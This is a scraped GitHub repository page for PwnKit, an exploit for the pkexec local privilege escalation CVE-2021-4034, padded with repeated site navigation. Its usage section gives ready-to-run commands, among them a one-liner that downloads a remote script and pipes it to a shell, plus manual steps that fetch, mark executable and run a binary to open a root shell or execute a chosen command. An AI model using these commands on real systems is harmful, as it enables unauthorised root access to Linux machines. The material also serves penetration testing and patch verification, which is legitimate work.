PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Usage

Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

Manually

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

Patched

Running the exploit against patched versions will yield the following output.

Build

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

Technical Details

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

References

https://github.com/arthepsy/CVE-2021-4034/

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
Makefile		Makefile
PwnKit		PwnKit
PwnKit.c		PwnKit.c
PwnKit.sh		PwnKit.sh
PwnKit32		PwnKit32
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Makefile

Makefile

PwnKit

PwnKit

PwnKit.c

PwnKit.c

PwnKit.sh

PwnKit.sh

PwnKit32

PwnKit32

README.md

README.md

Repository files navigation

PwnKit

Usage

Manually

Patched

Build

Technical Details

References

About

Releases

Packages

Languages

X-Projetion/Exploiting-PwnKit-CVE-2021-4034-

Folders and files

Latest commit

History

Repository files navigation

PwnKit

Usage

Manually

Patched

Build

Technical Details

References

About

Resources

Stars

Watchers

Forks

Languages